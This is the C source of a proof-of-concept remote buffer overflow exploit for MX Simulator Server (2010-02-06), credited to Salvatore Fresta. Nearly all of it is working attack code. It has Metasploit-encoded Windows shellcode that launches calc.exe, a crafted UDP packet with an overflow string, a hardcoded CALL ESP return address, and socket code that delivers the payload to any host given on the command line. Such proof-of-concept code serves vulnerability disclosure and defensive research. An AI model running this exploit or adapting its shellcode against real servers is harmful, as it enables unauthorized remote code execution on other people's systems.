/*
MX Simulator Server 2010-02-06 Remote Buffer Overflow PoC This PoC will executes the calc.exe software on the remote system. The bug was discovered by Luigi Auriemma (www.aluigi.org)
Copyright 2010 Salvatore Fresta aka Drosophila http://www.salvatorefresta.net/?opt=adv http://www.salvatorefresta.net/files/poc/PoC-MXSimulatorServer2010-02-06.zip
This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation,Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
http://www.gnu.org/licenses/gpl-2.0.txt
*/
#include <stdio.h> #include <stdlib.h> #include <string.h> #include <time.h>
#ifdef WIN32 #include <winsock.h> #include "winerr.h"
#define close closesocket #else #include <unistd.h> #include <sys/socket.h> #include <sys/types.h> #include <arpa/inet.h> #include <netinet/in.h> #include <netdb.h> #endif
#define BUFFSZ 1024 #define PORT 19800
/* * windows/exec - 511 bytes * http://www.metasploit.com * Encoder: x86/alpha_mixed * EXITFUNC=process, CMD=calc.exe */ #define shellcode \ "\xb8\x9e\xef\xf3\x90\x31\xc9\xb1\x33\xd9\xc2\xd9\x74\x24\xf4" \ "\x5b\x31\x43\x0e\x83\xc3\x04\x03\xdd\xe5\x11\x65\x1d\x11\x5c" \ "\x86\xdd\xe2\x3f\x0e\x38\xd3\x6d\x74\x49\x46\xa2\xfe\x1f\x6b" \ "\x49\x52\x8b\xf8\x3f\x7b\xbc\x49\xf5\x5d\xf3\x4a\x3b\x62\x5f" \ "\x88\x5d\x1e\x9d\xdd\xbd\x1f\x6e\x10\xbf\x58\x92\xdb\xed\x31" \ "\xd9\x4e\x02\x35\x9f\x52\x23\x99\x94\xeb\x5b\x9c\x6a\x9f\xd1" \ "\x9f\xba\x30\x6d\xd7\x22\x3a\x29\xc8\x53\xef\x29\x34\x1a\x84" \ "\x9a\xce\x9d\x4c\xd3\x2f\xac\xb0\xb8\x11\x01\x3d\xc0\x56\xa5" \ "\xde\xb7\xac\xd6\x63\xc0\x76\xa5\xbf\x45\x6b\x0d\x4b\xfd\x4f" \ "\xac\x98\x98\x04\xa2\x55\xee\x43\xa6\x68\x23\xf8\xd2\xe1\xc2" \ "\x2f\x53\xb1\xe0\xeb\x38\x61\x88\xaa\xe4\xc4\xb5\xad\x40\xb8" \ "\x13\xa5\x62\xad\x22\xe4\xe8\x30\xa6\x92\x55\x32\xb8\x9c\xf5" \ "\x5b\x89\x17\x9a\x1c\x16\xf2\xdf\xd3\x5c\x5f\x49\x7c\x39\x35" \ "\xc8\xe1\xba\xe3\x0e\x1c\x39\x06\xee\xdb\x21\x63\xeb\xa0\xe5" \ "\x9f\x81\xb9\x83\x9f\x36\xb9\x81\xc3\xd9\x29\x49\x2a\x7c\xca" \ "\xe8\x32"
int send_recv(int sd, unsigned char *in, int insz, unsigned char *out, int outsz, struct sockaddr_in *peer, int err); int timeout(int sock, int secs); unsigned int resolv(char *host); void std_err(void);
int main(int argc, char *argv[]) {
struct sockaddr_in peer; int sd, len; unsigned short port = PORT; unsigned char buff[BUFFSZ], *host = NULL, pkg[] = "\x03" "\x00\x00\x00\x00" // slot "\x00\x00\x00\x00" // session id "\x00\x00\x00\x00" // admin pwd crc "\x00\x00\x00\x00" // uid "000000000000000000000000" // ??? "yz250f||||\n" // bike's model "999\n" // bike's number "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "\xd8\x69\x83\x7c" // EIP - CALL ESP (FFD4) shellcode;
#ifdef WIN32 WSADATA wsadata; WSAStartup(MAKEWORD(1,0), &wsadata); #endif
if(argc < 2) { printf("\nMX Simulator Server 2010-02-06 Remote Buffer Overflow PoC - Salvatore Fresta\n" "http://www.salvatorefresta.net\n" "\n" "Usage: %s <target host> <port> (default: %hu)\n" "\n", argv[0], port); return -1; }
host = argv[1]; if(argc > 2) port = atoi(argv[2]);
peer.sin_addr.s_addr = resolv(host); peer.sin_port = htons(port); peer.sin_family = AF_INET; printf("\n[*] Socket opening in progress...");
sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); if(sd < 0) { printf("\n[-] Unable to open a socket!\n\n"); std_err(); } printf("\n[+] Socket open successfully" "\n[*] Data sending in progress...");
memset(buff, 0, 9); len = send_recv(sd, buff, 9, buff, BUFFSZ, &peer, 1); *(int *)(pkg + 1) = *(int *)(buff + 1); *(int *)(pkg + 5) = *(int *)(buff + 5); len = send_recv(sd, pkg, sizeof(pkg) - 1, buff, BUFFSZ, &peer, 0);
printf("\n[+] Data sent successfully" "\n[+] Connection closed\n\n"); close(sd);
return 0; }
int send_recv(int sd, unsigned char *in, int insz, unsigned char *out, int outsz, struct sockaddr_in *peer, int err) {
int retry, len;
if(in && !out) { fputc('.', stdout); if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in)) < 0) std_err(); return(0); } if(in) { for(retry = 2; retry; retry--) { fputc('.', stdout); if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in)) < 0) std_err(); if(!timeout(sd, 1)) break; }
if(!retry) { if(!err) return(-1); printf("\nError: socket timeout, no reply received\n\n"); exit(1); } } else { if(timeout(sd, 3) < 0) return(-1); }
fputc('.', stdout); len = recvfrom(sd, out, outsz, 0, NULL, NULL); if(len < 0 && err) std_err(); return len; }
int timeout(int sock, int secs) {
struct timeval tout; fd_set fd_read; int err;
tout.tv_sec = secs; tout.tv_usec = 0; FD_ZERO(&fd_read); FD_SET(sock, &fd_read); err = select(sock + 1, &fd_read, NULL, NULL, &tout); if(err < 0) std_err(); if(!err) return(-1); return 0; }
unsigned int resolv(char *host) {
struct hostent *hp = NULL; unsigned int host_ip;
host_ip = inet_addr(host); if(host_ip == INADDR_NONE) { hp = gethostbyname(host); if(!hp) { printf("\nError: Unable to resolv hostname (%s)\n", host); exit(1); } else host_ip = *(unsigned int *)hp->h_addr; } return host_ip;
}
#ifndef WIN32 void std_err(void) { perror("\nError"); exit(1); } #endif
|